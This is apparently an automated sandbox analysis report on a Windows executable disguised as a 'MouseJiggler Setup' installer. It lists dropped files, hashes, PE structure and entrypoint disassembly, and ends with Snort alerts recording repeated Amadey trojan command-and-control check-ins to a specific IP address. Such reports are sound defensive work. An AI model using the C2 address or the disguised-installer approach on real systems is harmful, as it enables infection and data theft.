                                                                  SSDEEP:1536:66HxpY0r9L0ZhzWrynbD73TeHPdhTvaDOQZrjluMhqmed0pVPkG:XH3YGqcPdhAOIxuMhqmed0pVPkG
                                                                  MD5:B14ACC8CA34A475A80374BC3CDE39D82
                                                                  SHA1:4387261C42D25A952E6040BDE8FD2C1002344EF2
                                                                  SHA-256:995BCF20D09F5E8EDDA7918E21AC364ADF64E843DFC476ACE062163A4EACDABB
                                                                  SHA-512:C79ABDF904A017F113F59CEFFEA55FDFCE584FED29D663B154A56299B3CF5B61F13F89494764B6762698B4BA4B7E631B7FBC7BEFA1B687B2F927CC0047B6C521
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <.d....!..`...B..'....#..]....#...S...%.......+..]8...+...}...1.......@..r....@...<...C.......F.......I..(....K.......L.......M..bb...M...i...N...M...O..A....P.. ....P.._....P.......R...@...S.. }...T..R....X...2...X..@....Y...Z...Y..@....Y...}......rr...............6.......]...................................................;..Qk...;...e...[..\.......+........^.......=..H4......IA......I...X\..J...t...J.......KS..b...KS......PK......Vt...4..V....J..X...l*......................k....$..Lg...........y..sq...y...q.......K......'.......u...............7....,..n....,..!......X.......&{......o....0..QE......X...+...)M..+...w...0E......6`......6`......6`......6`..3...6`..B...6`..b6..6`...>..H5...B..H5......H5...[..H5../,..H5..4/..H5..CS..H5......H5...4..L...b...L.......L....h..L....!..r...Z...r.......v...q&..v....@..v...b...v.......v....O......J.......i..............._...........D..k....D..........M.......dc...`..Z...............Q.......S....s...q...s..!....s..S....e..1......K......i....
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\translations\tupi_pt.qm (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:Qt Translation file
                                                                  Category:dropped
                                                                  Size (bytes):124365
                                                                  Entropy (8bit):4.7509179893514215
                                                                  Encrypted:false
                                                                  SSDEEP:1536:EmMiZqlw68/7MTBYxuJbOwZ3lJJebiHALMygp0qoENdv2bmML1+dIxF/:E+OmTQDMLMygzabwdIxF/
                                                                  MD5:3BA2C4FA13A5B0D0C6D55F51A0869CAD
                                                                  SHA1:60A65766010A1239B97CDC47F7DEF79F7A0FC3F7
                                                                  SHA-256:FB8FCF337478171B91E9CFE7AC26D3F4DEBBB7EDF40D6F4137E168F3023680E5
                                                                  SHA-512:ED4EBB1B51A3D7CFA0E48196266E79A75FBE86E74B799963B3AE6205B1C9A7D6EFFBE612EE0919215FF8CD03CEE731FCD65F7A7387DA9A272AA78BB1142B1C94
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <.d....!..`...B..'....#...Z...#..o3...%..Vi...+.......+..o]...1..V....@...D...@.......C...O...F...C...I..9....K.......L.......M.......M.......N..!....O..\....P...S...P...X...P..t....R.......S.......T..u$...X..,6...X..[....Y..,^...Y..[....Y..0q..............a.......b"......bI......bp......j[......j.......j.......j............;..s....;.......[..........=........^......1Y..H4......IA..X...I...|...J.......J...K;..KS...O..KS..A...PK......Vt.....V.......X....Z.......V.......?.......}...$..l.......6I...y...m...y..J........#......8...............>Y...........,.......,...Y.....}.......6............0..r.......}B..+...:...+....i..0E......6`...%..6`..$...6`..B#..6`..I@..6`..^...6`...|..6`......H5......H5...-..H5..%y..H5..B...H5..I...H5.._o..H5......H5...J..L.......L.......L...!...L.......r...~...r....@..v....*..v...E`..v.......v.......v...........j...............*!......).......*....D.......D..N.......m........Q...`..........,.......s.......uD...s.......s../....s..v....e..E......j.......5...
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\translations\tupi_zh_CN.qm (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:Qt Translation file
                                                                  Category:dropped
                                                                  Size (bytes):91302
                                                                  Entropy (8bit):5.747079697269967
                                                                  Encrypted:false
                                                                  SSDEEP:1536:q/QqehAItvGulb9P/8LjNI0ROAbp1CSBN4YtHB64iF77E:qIqeKYyNI08AHzwYtHB64iF77E
                                                                  MD5:10681259694AAFAAAEBE2A3CF79758CA
                                                                  SHA1:07CF19DE4A64504A8AFB56C91EA528EDE2D105F9
                                                                  SHA-256:3D41367E7F35E48F5190946D92602CEE4F4AB711B460AEF16332C28FB5790140
                                                                  SHA-512:09CB18E09E6BD188C6325CC3893AF3AE6624BBBA2A01CA1DF2A921C758A8FDE17CA9697A149784A2D0A8FBE9830A830AFF7A6BF9D44CED93634B904603B8CA37
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <.d....!..`...B..'....#..\....#...[...%.......+..\....+.......1.......@..r....@.......C.......F.......I..(....K.......L.......M..b:...M.......N...c...O..@....P.. ....P.._....P.......R...N...S.. ....T..R....X...F...X..@....Y...n...Y..@....Y..........rZ...............B.......i.......................................#...........;..Q....;...#...[..[.......+........<.........H4...i..IA...0..I...X...J...t...J.......KS..a...KS......PK......Vt......V....\..X...l................{......kc...$..L7.......)...y..s[...y.................'.......t........+......5....,..n|...,..!......Xs......&.......n....0..P.......X...+...);..+...w...0E...$..6`......6`......6`......6`..3...6`..B...6`..b...6`...d..H5...J..H5......H5...s..H5../...H5..4...H5..C?..H5...?..H5......L...ba..L.......L.......L.......r...Y...r.......v...q...v....d..v...b...v.......v....1......J.......ih......................w...D..k....D..........L.......d7...`..Zb..............Q.......R....s.......s..!....s..S....e..1g.....J......i....
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\translations\tupi_zh_TW.qm (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:Qt Translation file
                                                                  Category:dropped
                                                                  Size (bytes):91670
                                                                  Entropy (8bit):5.729191695206176
                                                                  Encrypted:false
                                                                  SSDEEP:1536:66HxpY0r9L0ZhzWrynbD73TeHPdhTvaDOQZrjluMhqmed0pVPkG:XH3YGqcPdhAOIxuMhqmed0pVPkG
                                                                  MD5:B14ACC8CA34A475A80374BC3CDE39D82
                                                                  SHA1:4387261C42D25A952E6040BDE8FD2C1002344EF2
                                                                  SHA-256:995BCF20D09F5E8EDDA7918E21AC364ADF64E843DFC476ACE062163A4EACDABB
                                                                  SHA-512:C79ABDF904A017F113F59CEFFEA55FDFCE584FED29D663B154A56299B3CF5B61F13F89494764B6762698B4BA4B7E631B7FBC7BEFA1B687B2F927CC0047B6C521
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <.d....!..`...B..'....#..]....#...S...%.......+..]8...+...}...1.......@..r....@...<...C.......F.......I..(....K.......L.......M..bb...M...i...N...M...O..A....P.. ....P.._....P.......R...@...S.. }...T..R....X...2...X..@....Y...Z...Y..@....Y...}......rr...............6.......]...................................................;..Qk...;...e...[..\.......+........^.......=..H4......IA......I...X\..J...t...J.......KS..b...KS......PK......Vt...4..V....J..X...l*......................k....$..Lg...........y..sq...y...q.......K......'.......u...............7....,..n....,..!......X.......&{......o....0..QE......X...+...)M..+...w...0E......6`......6`......6`......6`..3...6`..B...6`..b6..6`...>..H5...B..H5......H5...[..H5../,..H5..4/..H5..CS..H5......H5...4..L...b...L.......L....h..L....!..r...Z...r.......v...q&..v....@..v...b...v.......v....O......J.......i..............._...........D..k....D..........M.......dc...`..Z...............Q.......S....s...q...s..!....s..S....e..1......K......i....
                                                                  C:\Users\user\Desktop\MouseJiggler.lnk
                                                                  Process:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Aug 4 10:58:41 2021, mtime=Wed Aug 4 10:58:41 2021, atime=Wed Aug 4 10:58:41 2021, length=51200, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):1128
                                                                  Entropy (8bit):4.614840669661899
                                                                  Encrypted:false
                                                                  SSDEEP:24:8mSQoQ/dOEQ0WJT2KFuJkAjqjPU3d8pJsJtd8pJzUUm1lb1X7aB6m:8mSQoQ/dOBsB92jc3diSDdiOH1lb1mB6
                                                                  MD5:43A1B98172F85559C6CC4CE787036A98
                                                                  SHA1:7B23EB8BC950036A6D157BB4B99F195172369832
                                                                  SHA-256:1D05D2C446383BCC1EA748EA72923024315D7AE83EDF2050A3AE4BE58A49637E
                                                                  SHA-512:F598D691333F044DFD688B0C414C9922B4A122E1D0E2BDEE9F1CA342B7FDDD568E53C3B2FCF3A0F0D493AAAE68D411BF017589FA87DF81314F01B124F041EC30
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: L..................F.... .......(.......(.......(................................P.O. .:i.....+00.../C:\.....................1.....AS.6..PROGRA~2.........L.AS.6....................V.....o~(.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....b.1.....AS.6..MOUSEJ~1..J......AS.6AS.6..........................n...M.o.u.s.e.J.i.g.g.l.e.r.....n.2......SU_ .MOUSEJ~1.EXE..R.......SU_.SU_..........................^8..M.o.u.s.e.J.i.g.g.l.e.r...e.x.e.......c...............-.......b..................C:\Program Files (x86)\MouseJiggler\MouseJiggler.exe..:.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.o.u.s.e.J.i.g.g.l.e.r.\.M.o.u.s.e.J.i.g.g.l.e.r...e.x.e.#.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.o.u.s.e.J.i.g.g.l.e.r.........*................@Z|...K.J.........`.......X.......128757...........!a..%.H.VZAj.....M..........-..!a..%.H.VZAj.....M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5
                                                                  \Device\Null
                                                                  Process:C:\Windows\SysWOW64\PING.EXE
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):331
                                                                  Entropy (8bit):4.92149009030101
                                                                  Encrypted:false
                                                                  SSDEEP:6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
                                                                  MD5:2E512EE24AAB186D09E9A1F9B72A0569
                                                                  SHA1:C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
                                                                  SHA-256:DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
                                                                  SHA-512:6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: ..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.966873247221295
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Ac372JNTO6.exe
                                                                  File size:1026959
                                                                  MD5:52eeafe4196446eccbada6dd4c750aa2
                                                                  SHA1:1e8e1eb56e282b5e85c0e7f5ba25a524965706f1
                                                                  SHA256:663d4270b4fefb6cf4c941532b4aaa3957f43874a6ad73e9b87ccdeedaddb634
                                                                  SHA512:1710439ed62a6c28934528956953e64fb52840df1f17985ce3a6d5499b30920f95cc81ee6c885a88186716ef96f53e0fabcaf9861e12ab94cccdeedad3e43f2f
                                                                  SSDEEP:24576:CQ9o65HYl7Du97vZo0yIsoTcc1Uiwz7H00svO7WOpRBs2i:CQNip2vZomsoj23zL00svqWOri
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._...............................y...........3...........Rich............................PE..L.....FM...........................

                                                                  File Icon

                                                                  Icon Hash:608173e49ce0e0c4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x401d20
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x4D46F4ED [Mon Jan 31 17:44:13 2011 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d221b1dc8c3a08622f6512e7876527c8

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 00402128h
                                                                  push 00401EA0h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 68h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  xor ebx, ebx
                                                                  mov dword ptr [ebp-04h], ebx
                                                                  push 00000002h
                                                                  call dword ptr [00402088h]
                                                                  pop ecx
                                                                  or dword ptr [00403554h], FFFFFFFFh
                                                                  or dword ptr [00403558h], FFFFFFFFh
                                                                  call dword ptr [00402084h]
                                                                  mov ecx, dword ptr [004032CCh]
                                                                  mov dword ptr [eax], ecx
                                                                  call dword ptr [00402080h]
                                                                  mov ecx, dword ptr [004032C8h]
                                                                  mov dword ptr [eax], ecx
                                                                  mov eax, dword ptr [0040207Ch]
                                                                  mov eax, dword ptr [eax]
                                                                  mov dword ptr [0040355Ch], eax
                                                                  call 00007FEF80C836A5h
                                                                  cmp dword ptr [004032BCh], ebx
                                                                  jne 00007FEF80C8359Eh
                                                                  push 00401E9Ch
                                                                  call dword ptr [00402078h]
                                                                  pop ecx
                                                                  call 00007FEF80C83677h
                                                                  push 0040300Ch
                                                                  push 00403008h
                                                                  call 00007FEF80C83662h
                                                                  mov eax, dword ptr [004032C4h]
                                                                  mov dword ptr [ebp-6Ch], eax
                                                                  lea eax, dword ptr [ebp-6Ch]
                                                                  push eax
                                                                  push dword ptr [004032C0h]
                                                                  lea eax, dword ptr [ebp-64h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-70h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-60h]
                                                                  push eax
                                                                  call dword ptr [00402070h]
                                                                  push 00403004h
                                                                  push 00403000h
                                                                  call 00007FEF80C8362Fh

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS98 (6.0) build 8168
                                                                  • [LNK] VS98 (6.0) imp/exp build 8168

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x21340x50.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xea0000x68fd.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000xa4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000xeac0x1000False0.645751953125data5.9419987076IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x20000x4880x1000False0.15673828125data1.73893297809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x30000x5600x1000False0.082275390625data1.01054216949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .gentee0x40000xe55790xe6000False0.996970533288data7.99864437802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xea0000x68fd0x7000False0.742850167411data6.99235098533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0xea4380x2e8data
                                                                  RT_DIALOG0xea7200x1d8dataEnglishUnited States
                                                                  RT_DIALOG0xea8f80x220dataEnglishUnited States
                                                                  RT_DIALOG0xeab180x258dataEnglishUnited States
                                                                  RT_DIALOG0xead700x158dataEnglishUnited States
                                                                  RT_DIALOG0xeaec80x1b8data
                                                                  RT_DIALOG0xeb0800x198data
                                                                  RT_DIALOG0xeb2180x198data
                                                                  RT_DIALOG0xeb3b00x158dataEnglishUnited States
                                                                  RT_DIALOG0xeb5080x36dataEnglishUnited States
                                                                  RT_RCDATA0xeb5400x48c2data
                                                                  RT_GROUP_ICON0xefe040x14data
                                                                  RT_VERSION0xefe180x374dataEnglishUnited States
                                                                  RT_MANIFEST0xf018c0x771XML 1.0 document, ASCII text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllCloseHandle, WriteFile, CreateDirectoryA, lstrcpyA, CreateFileA, GetFileAttributesA, lstrlenA, GetTempPathA, lstrcmpA, lstrcatA, ExitProcess, DeleteFileA, FreeLibrary, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetFileSize, GetLastError, CreateMutexA, GetModuleFileNameA, VirtualAlloc, VirtualFree, GetStartupInfoA
                                                                  USER32.dllMessageBoxA, wsprintfA
                                                                  MSVCRT.dll_exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp

                                                                  Version Infos

                                                                  DescriptionData
                                                                  LegalCopyrightCopyright 2021 Arkane System
                                                                  InternalNameMouseJiggler
                                                                  FileVersion1.2.0.0
                                                                  CompanyNameArkane System
                                                                  PrivateBuild
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameMouseJiggler
                                                                  SpecialBuild
                                                                  ProductVersion1.2.0.0
                                                                  FileDescriptionMouseJiggler Setup
                                                                  OriginalFilenameMouseJiggler.exe
                                                                  Translation0x0409 0x04e4

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  09/30/21-23:52:49.789021TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.391.241.19.101
                                                                  09/30/21-23:52:50.250511TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.391.241.19.101
                                                                  09/30/21-23:52:50.727705TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.391.241.19.101
                                                                  09/30/21-23:52:51.167845TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.391.241.19.101
                                                                  09/30/21-23:52:51.796936TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.391.241.19.101
                                                                  09/30/21-23:52:52.250096TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.391.241.19.101
                                                                  09/30/21-23:52:52.740219TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.391.241.19.101
                                                                  09/30/21-23:52:53.171267TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.391.241.19.101
                                                                  09/30/21-23:52:53.574667TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.391.241.19.101
                                                                  09/30/21-23:52:54.015428TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.391.241.19.101
                                                                  09/30/21-23:52:54.769205TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.391.241.19.101
                                                                  09/30/21-23:52:55.182862TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.391.241.19.101
                                                                  09/30/21-23:52:55.632445TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.391.241.19.101
                                                                  09/30/21-23:52:56.144250TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.391.241.19.101
                                                                  09/30/21-23:52:56.577395TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.391.241.19.101
                                                                  09/30/21-23:52:57.015826TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.391.241.19.101
                                                                  09/30/21-23:52:57.426272TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.391.241.19.101
                                                                  09/30/21-23:52:57.870568TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.391.241.19.101
                                                                  09/30/21-23:52:58.316092TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.391.241.19.101
                                                                  09/30/21-23:52:58.760878TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.391.241.19.101
                                                                  09/30/21-23:52:59.227293TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.391.241.19.101
                                                                  09/30/21-23:52:59.678493TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.391.241.19.101
                                                                  09/30/21-23:53:00.144609TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:00.468783TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:00.887879TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:01.339015TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.391.241.19.101
                                                                  09/30/21-23:53:01.770476TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:02.207903TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:02.627756TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:03.072542TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:03.506822TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:03.971727TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:04.450473TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:04.974306TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:05.431366TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.391.241.19.101
                                                                  09/30/21-23:53:06.277013TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.391.241.19.101
                                                                  09/30/21-23:53:07.186939TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:07.685807TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:08.129940TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.391.241.19.101
                                                                  09/30/21-23:53:08.614898TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:09.049404TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.391.241.19.101
                                                                  09/30/21-23:53:09.508666TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:09.967240TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.391.241.19.101
                                                                  09/30/21-23:53:10.424632TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.391.241.19.101
                                                                  09/30/21-23:53:10.898563TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:11.436705TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:11.890829TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:12.375405TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.391.241.19.101
                                                                  09/30/21-23:53:12.832336TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.391.241.19.101
                                                                  09/30/21-23:53:13.275178TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:13.547190TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:14.871170TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:15.308587TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.391.241.19.101
                                                                  09/30/21-23:53:15.769655TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:16.192995TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:16.644432TCP2027700ET TROJAN Amadey CnC Check-In4988880192.168.2.391.241.19.101
                                                                  09/30/21-23:53:17.067684TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.391.241.19.101
                                                                  09/30/21-23:53:17.514521TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:18.010990TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:18.436256TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.391.241.19.101
                                                                  09/30/21-23:53:18.857175TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:19.463560TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:19.892335TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.391.241.19.101
                                                                  09/30/21-23:53:20.353724TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.391.241.19.101
                                                                  09/30/21-23:53:21.313917TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:21.771858TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:22.230630TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.391.241.19.101
                                                                  09/30/21-23:53:22.673635TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:23.092631TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:23.620063TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.391.241.19.101
                                                                  09/30/21-23:53:24.311203TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.391.241.19.101
                                                                  09/30/21-23:53:25.745214TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.391.241.19.101
                                                                  09/30/21-23:53:26.167166TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.391.241.19.101
                                                                  09/30/21-23:53:26.614982TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.391.241.19.101
                                                                  09/30/21-23:53:27.042021TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.391.241.19.101
                                                                  09/30/21-23:53:27.511880TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:27.925473TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:28.348869TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.391.241.19.101
                                                                  09/30/21-23:53:28.764977TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.391.241.19.101
                                                                  09/30/21-23:53:29.195790TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.391.241.19.101
                                                                  09/30/21-23:53:29.628178TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.391.241.19.101
                                                                  09/30/21-23:53:30.078066TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.391.241.19.101
                                                                  09/30/21-23:53:30.518198TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.391.241.19.101
